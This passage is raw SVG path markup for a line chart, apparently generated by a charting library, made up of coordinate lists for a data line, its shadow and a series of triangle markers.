226.18284546133492 L 285.06985294117646 226.18284546133492 L 286.59788602941177 226.18284546133492 L 288.1259191176471 226.18284546133492 L 289.6539522058824 226.18284546133492 L 291.1819852941177 226.18284546133492 L 292.7100183823529 226.18284546133492 L 294.23805147058823 226.18284546133492 L 295.76608455882354 226.18284546133492 L 297.29411764705884 226.18284546133492 L 298.82215073529414 226.18284546133492 L 300.35018382352945 225.3436854613349 L 301.8782169117647 224.7328930133349 L 303.40625 223.63356558933492 L 304.9342830882353 222.70822420266865 L 306.4623161764706 222.46780116266865 L 307.9903492647059 217.62137185066865 L 309.51838235294116 214.23019378133608 L 311.04641544117646 213.85766002133607 L 312.57444852941177 213.85766002133607 L 314.1024816176471 213.85766002133607 L 315.6305147058824 213.4392344213361 L 317.1585477941177 211.70801922133597 L 318.6865808823529 210.78822171733597 L 320.21461397058823 206.15989467733596 L 321.74264705882354 206.15989467733596 L 323.27068014705884 206.15989467733596 L 324.79871323529414 204.18924507733595 L 326.32674632352945 200.70281499733596 L 327.8547794117647 198.08428059733598 L 329.3828125 194.27795739733597 L 330.9108455882353 192.84856155733598 L 332.4388786764706 191.55279195733598 L 333.9669117647059 190.62483195733597 L 335.4949448529412 189.96075003733597 L 337.02297794117646 189.43029435733598 L 338.55101102941177 189.43029435733598 L 340.0790441176471 189.04156347733598 L 341.6070772058824 188.656881877336 L 343.1351102941177 187.14312603733597 L 344.6631433823529 186.93188859733596 L 346.19117647058823 185.84263227733598 L 347.71920955882354 184.64202075733596 L 349.24724264705884 184.10307579733598 L 350.77527573529414 184.056509077336 L 352.30330882352945 184.056509077336 L 353.8313419117647 184.056509077336 L 355.359375 184.056509077336 L 356.8874080882353 184.056509077336 L 358.4154411764706 184.056509077336 L 359.9434742647059 184.056509077336 L 361.4715073529412 184.056509077336 L 362.99954044117646 184.056509077336 L 364.52757352941177 184.056509077336 L 366.0556066176471 183.89566267733596 L 367.5836397058824 182.08698427733597 L 369.1116727941177 179.46305083733597 L 370.6397058823529 178.09439419733596 L 372.16773897058823 176.30056315733597 L 373.69577205882354 175.09522747733598 L 375.22380514705884 174.26647483733598 L 376.75183823529414 173.595928277336 L 378.27987132352945 173.595928277336 L 379.8079044117647 173.38577064533598 L 381.3359375 173.38577064533598 L 382.8639705882353 173.36823915733595 L 384.3920036764706 172.84311147733598 L 385.9200367647059 172.20678843733594 L 387.4480698529412 170.69409859200272 L 388.97610294117646 168.3879981120027 L 390.50413602941177 166.4769013440027 L 392.0321691176471 166.03602631466944 L 393.5602022058824 165.88442695466946 L 395.0882352941177 165.42724785066943" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.4867136 L 120.04227941176471 236.4867136 L 121.5703125 236.4867136 L 123.0983455882353 236.08516 L 124.6263786764706 236.08516 L 126.15441176470588 236.08516 L 127.68244485294119 235.96556415999999 L 129.21047794117646 235.77993664 L 130.73851102941177 235.77993664 L 132.26654411764707 235.77993664 L 133.79457720588235 235.77993664 L 135.32261029411765 235.77993664 L 136.85064338235296 235.77993664 L 138.37867647058823 235.77993664 L 139.90670955882354 235.77993664 L 141.43474264705884 235.77993664 L 142.96277573529412 235.77993664 L 144.49080882352942 235.77993664 L 146.01884191176472 235.77993664 L 147.546875 235.77993664 L 149.0749080882353 235.77993664 L 150.6029411764706 235.77993664 L 152.13097426470588 235.77993664 L 153.6590073529412 235.77993664 L 155.18704044117646 235.77993664 L 156.71507352941177 235.77993664 L 158.24310661764707 235.77993664 L 159.77113970588235 235.77993664 L 161.29917279411765 235.77993664 L 162.82720588235296 235.77993664 L 164.35523897058823 235.77993664 L 165.88327205882354 235.45261984 L 167.41130514705884 235.15567264 L 168.93933823529412 234.31029664 L 170.46737132352942 234.31029664 L 171.99540441176472 234.31029664 L 173.5234375 233.85315423999998 L 175.0514705882353 233.85315423999998 L 176.5795036764706 233.85315423999998 L 178.10753676470588 233.64056704 L 179.6355698529412 233.64056704 L 181.1636029411765 233.16342688 L 182.69163602941177 233.16342688 L 184.21966911764707 233.16342688 L 185.74770220588235 233.16342688 L 187.27573529411765 233.16342688 L 188.80376838235296 233.16342688 L 190.33180147058823 233.16342688 L 191.85983455882354 233.16342688 L 193.38786764705884 233.16342688 L 194.91590073529412 233.16342688 L 196.44393382352942 233.16342688 L 197.97196691176472 233.16342688 L 199.5 233.16342688 L 201.0280330882353 233.16342688 L 202.5560661764706 233.16342688 L 204.08409926470588 233.16342688 L 205.6121323529412 233.16342688 L 207.1401654411765 233.16342688 L 208.66819852941177 233.16342688 L 210.19623161764707 233.16342688 L 211.72426470588235 233.16342688 L 213.25229779411765 232.99335711999998 L 214.78033088235296 232.99335711999998 L 216.30836397058823 232.99335711999998 L 217.83639705882354 232.99335711999998 L 219.36443014705884 232.99335711999998 L 220.89246323529412 232.99335711999998 L 222.42049632352942 232.99335711999998 L 223.94852941176472 232.99335711999998 L 225.4765625 232.99335711999998 L 227.0045955882353 232.99335711999998 L 228.5326286764706 232.99335711999998 L 230.06066176470588 232.99335711999998 L 231.5886948529412 232.99335711999998 L 233.1167279411765 232.99335711999998 L 234.64476102941177 232.99335711999998 L 236.17279411764707 232.99335711999998 L 237.70082720588238 232.99335711999998 L 239.22886029411765 232.99335711999998 L 240.75689338235296 232.99335711999998 L 242.28492647058823 231.88331765333254 L 243.81295955882354 231.88331765333254 L 245.34099264705884 231.88331765333254 L 246.86902573529412 231.35016245333253 L 248.39705882352942 230.57796949333255 L 249.92509191176472 230.57796949333255 L 251.453125 230.57796949333255 L 252.9811580882353 230.57796949333255 L 254.5091911764706 230.57796949333255 L 256.0372242647059 230.57796949333255 L 257.56525735294116 229.79066869333252 L 259.09329044117646 229.79066869333252 L 260.62132352941177 229.79066869333252 L 262.1493566176471 226.4715993813349 L 263.6773897058824 226.18284546133492 L 265.2054227941177 226.18284546133492 L 266.7334558823529 226.18284546133492 L 268.26148897058823 226.18284546133492 L 269.78952205882354 226.18284546133492 L 271.31755514705884 226.18284546133492 L 272.84558823529414 226.18284546133492 L 274.37362132352945 226.18284546133492 L 275.9016544117647 226.18284546133492 L 277.4296875 226.18284546133492 L 278.9577205882353 226.18284546133492 L 280.4857536764706 226.18284546133492 L 282.0137867647059 226.18284546133492 L 283.54181985294116 226.18284546133492 L 285.06985294117646 226.18284546133492 L 286.59788602941177 226.18284546133492 L 288.1259191176471 226.18284546133492 L 289.6539522058824 226.18284546133492 L 291.1819852941177 226.18284546133492 L 292.7100183823529 226.18284546133492 L 294.23805147058823 226.18284546133492 L 295.76608455882354 226.18284546133492 L 297.29411764705884 226.18284546133492 L 298.82215073529414 226.18284546133492 L 300.35018382352945 225.3436854613349 L 301.8782169117647 224.7328930133349 L 303.40625 223.63356558933492 L 304.9342830882353 222.70822420266865 L 306.4623161764706 222.46780116266865 L 307.9903492647059 217.62137185066865 L 309.51838235294116 214.23019378133608 L 311.04641544117646 213.85766002133607 L 312.57444852941177 213.85766002133607 L 314.1024816176471 213.85766002133607 L 315.6305147058824 213.4392344213361 L 317.1585477941177 211.70801922133597 L 318.6865808823529 210.78822171733597 L 320.21461397058823 206.15989467733596 L 321.74264705882354 206.15989467733596 L 323.27068014705884 206.15989467733596 L 324.79871323529414 204.18924507733595 L 326.32674632352945 200.70281499733596 L 327.8547794117647 198.08428059733598 L 329.3828125 194.27795739733597 L 330.9108455882353 192.84856155733598 L 332.4388786764706 191.55279195733598 L 333.9669117647059 190.62483195733597 L 335.4949448529412 189.96075003733597 L 337.02297794117646 189.43029435733598 L 338.55101102941177 189.43029435733598 L 340.0790441176471 189.04156347733598 L 341.6070772058824 188.656881877336 L 343.1351102941177 187.14312603733597 L 344.6631433823529 186.93188859733596 L 346.19117647058823 185.84263227733598 L 347.71920955882354 184.64202075733596 L 349.24724264705884 184.10307579733598 L 350.77527573529414 184.056509077336 L 352.30330882352945 184.056509077336 L 353.8313419117647 184.056509077336 L 355.359375 184.056509077336 L 356.8874080882353 184.056509077336 L 358.4154411764706 184.056509077336 L 359.9434742647059 184.056509077336 L 361.4715073529412 184.056509077336 L 362.99954044117646 184.056509077336 L 364.52757352941177 184.056509077336 L 366.0556066176471 183.89566267733596 L 367.5836397058824 182.08698427733597 L 369.1116727941177 179.46305083733597 L 370.6397058823529 178.09439419733596 L 372.16773897058823 176.30056315733597 L 373.69577205882354 175.09522747733598 L 375.22380514705884 174.26647483733598 L 376.75183823529414 173.595928277336 L 378.27987132352945 173.595928277336 L 379.8079044117647 173.38577064533598 L 381.3359375 173.38577064533598 L 382.8639705882353 173.36823915733595 L 384.3920036764706 172.84311147733598 L 385.9200367647059 172.20678843733594 L 387.4480698529412 170.69409859200272 L 388.97610294117646 168.3879981120027 L 390.50413602941177 166.4769013440027 L 392.0321691176471 166.03602631466944 L 393.5602022058824 165.88442695466946 L 395.0882352941177 165.42724785066943" fill="none" stroke="#7798BF" stroke-width="2"></path><path d="M 395 170.82 L 391 162.82 399 162.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 393.5 171.32 L 389.5 163.32 397.5 163.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 392 171.32 L 388 163.32 396 163.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 390.5 171.82 L 386.5 163.82 394.5 163.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 389 173.82 L 385 165.82 393 165.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 387.5 175.82 L 383.5 167.82 391.5 167.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 386 177.32 L 382 169.32 390 169.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 384.5 178.32 L 380.5 170.32 388.5 170.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 383 178.82 L 379 170.82 387 170.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 381.5 178.82 L 377.5 170.82 385.5 170.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 380 178.82 L 376 170.82 384 170.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 378.5 178.82 L 374.5 170.82 382.5 170.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 377 178.82 L 373 170.82 381 170.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 375 179.82 L 371 171.82 379 171.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 373.5 180.32 L 369.5 172.32 377.5 172.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 372 181.82 L 368 173.82 376 173.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 370.5 183.32 L 366.5 175.32 374.5 175.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 369 184.82 L 365 176.82 373 176.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 367.5 187.32 L 363.5 179.32 371.5 179.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 366 189.32 L 362 181.32 370 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 364.5 189.32 L 360.5 181.32 368.5 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 363 189.32 L 359 181.32 367 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 361.5 189.32 L 357.5 181.32 365.5 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 360 189.32 L 356 181.32 364 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 358.5 189.32 L 354.5 181.32 362.5 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 357 189.32 L 353 181.32 361 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 355.5 189.32 L 351.5 181.32 359.5 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 354 189.32 L 350 181.32 358 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 352.5 189.32 L 348.5 181.32 356.5 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 351 189.32 L 347 181.32 355 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 349 189.32 L 345 181.32 353 181.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 347.5 189.82 L 343.5 181.82 351.5 181.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 346 191.32 L 342 183.32 350 183.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 344.5 192.32 L 340.5 184.32 348.5 184.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 343 192.32 L 339 184.32 347 184.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 193.82 L 337.5 185.82 345.5 185.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 340 194.32 L 336 186.32 344 186.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 338.5 194.82 L 334.5 186.82 342.5 186.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 337 194.82 L 333 186.82 341 186.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 335.5 195.32 L 331.5 187.32 339.5 187.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 334 195.82 L 330 187.82 338 187.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 332.5 196.82 L 328.5 188.82 336.5 188.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 331 198.32 L 327 190.32 335 190.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 329.5 199.82 L 325.5 191.82 333.5 191.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 328 203.32 L 324 195.32 332 195.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 326.5 205.82 L 322.5 197.82 330.5 197.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 325 209.32 L 321 201.32 329 201.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 323.5 211.32 L 319.5 203.32 327.5 203.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 321.5 211.32 L 317.5 203.32 325.5 203.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 320 211.32 L 316 203.32 324 203.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 318.5 216.32 L 314.5 208.32 322.5 208.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 317 216.82 L 313 208.82 321 208.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 315.5 218.82 L 311.5 210.82 319.5 210.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 314 219.32 L 310 211.32 318 211.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 312.5 219.32 L 308.5 211.32 316.5 211.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 311 219.32 L 307 211.32 315 211.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 309.5 219.32 L 305.5 211.32 313.5 211.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 308 222.82 L 304 214.82 312 214.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 306.5 227.82 L 302.5 219.82 310.5 219.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 305 227.82 L 301 219.82 309 219.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 303.5 228.82 L 299.5 220.82 307.5 220.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 302 229.82 L 298 221.82 306 221.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 230.82 L 296.5 222.82 304.5 222.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 299 231.32 L 295 223.32 303 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 297.5 231.32 L 293.5 223.32 301.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 296 231.32 L 292 223.32 300 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 294 231.32 L 290 223.32 298 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 231.32 L 288.5 223.32 296.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 291 231.32 L 287 223.32 295 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 289.5 231.32 L 285.5 223.32 293.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 288 231.32 L 284 223.32 292 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 231.32 L 282.5 223.32 290.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 285 231.32 L 281 223.32 289 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 283.5 231.32 L 279.5 223.32 287.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 282 231.32 L 278 223.32 286 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 231.32 L 276.5 223.32 284.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 279 231.32 L 275 223.32 283 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 277.5 231.32 L 273.5 223.32 281.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 276 231.32 L 272 223.32 280 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 231.32 L 270.5 223.32 278.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 273 231.32 L 269 223.32 277 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 271.5 231.32 L 267.5 223.32 275.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 270 231.32 L 266 223.32 274 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 231.32 L 264.5 223.32 272.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 231.32 L 262.5 223.32 270.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 265 231.32 L 261 223.32 269 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 263.5 231.32 L 259.5 223.32 267.5 223.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 262 231.82 L 258 223.82 266 223.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 235.32 L 256.5 227.32 264.5 227.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 259 235.32 L 255 227.32 263 227.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 257.5 235.32 L 253.5 227.32 261.5 227.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 256 235.82 L 252 227.82 260 227.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 254.5 235.82 L 250.5 227.82 258.5 227.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 253 235.82 L 249 227.82 257 227.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 251.5 235.82 L 247.5 227.82 255.5 227.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 250 235.82 L 246 227.82 254 227.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 248.5 235.82 L 244.5 227.82 252.5 227.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 247 236.82 L 243 228.82 251 228.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 245.5 237.32 L 241.5 229.32 249.5 229.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 244 237.32 L 240 229.32 248 229.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 242.5 237.32 L 238.5 229.32 246.5 229.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 241 238.32 L 237 230.32 245 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 239 238.32 L 235 230.32 243 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 237.5 238.32 L 233.5 230.32 241.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 236 238.32 L 232 230.32 240 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 234.5 238.32 L 230.5 230.32 238.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 233 238.32 L 229 230.32 237 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 231.5 238.32 L 227.5 230.32 235.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 230 238.32 L 226 230.32 234 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 228.5 238.32 L 224.5 230.32 232.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 227 238.32 L 223 230.32 231 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 225.5 238.32 L 221.5 230.32 229.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 224 238.32 L 220 230.32 228 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 222.5 238.32 L 218.5 230.32 226.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 221 238.32 L 217 230.32 225 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 238.32 L 215.5 230.32 223.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 218 238.32 L 214 230.32 222 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 216.5 238.32 L 212.5 230.32 220.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 215 238.32 L 211 230.32 219 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 238.32 L 209.5 230.32 217.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 238.32 L 207.5 230.32 215.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 210 238.32 L 206 230.32 214 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 208.5 238.32 L 204.5 230.32 212.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 207 238.32 L 203 230.32 211 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 238.32 L 201.5 230.32 209.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 204 238.32 L 200 230.32 208 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 202.5 238.32 L 198.5 230.32 206.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 201 238.32 L 197 230.32 205 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 238.32 L 195.5 230.32 203.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 198 238.32 L 194 230.32 202 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 196.5 238.32 L 192.5 230.32 200.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 195 238.32 L 191 230.32 199 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 238.32 L 189.5 230.32 197.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 192 238.32 L 188 230.32 196 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 190.5 238.32 L 186.5 230.32 194.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 189 238.32 L 185 230.32 193 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 238.32 L 183.5 230.32 191.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 238.32 L 181.5 230.32 189.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 184 238.32 L 180 230.32 188 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 182.5 238.32 L 178.5 230.32 186.5 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 181 238.32 L 177 230.32 185 230.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 238.82 L 175.5 230.82 183.5 230.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 178 238.82 L 174 230.82 182 230.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 176.5 239.32 L 172.5 231.32 180.5 231.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 175 239.32 L 171 231.32 179 231.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 173.5 239.32 L 169.5 231.32 177.5 231.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 172 239.82 L 168 231.82 176 231.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 170.5 239.82 L 166.5 231.82 174.5 231.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 169 239.82 L 165 231.82 173 231.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 167.5 240.32 L 163.5 232.32 171.5 232.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 166 240.82 L 162 232.82 170 232.82 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 164.5 241.32 L 160.5 233.32 168.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 163 241.32 L 159 233.32 167 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 161.5 241.32 L 157.5 233.32 165.5 233.32 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 160 241.32 L 156 233.32 164 233.32 Z" fill="#7798BF" stroke="#333" 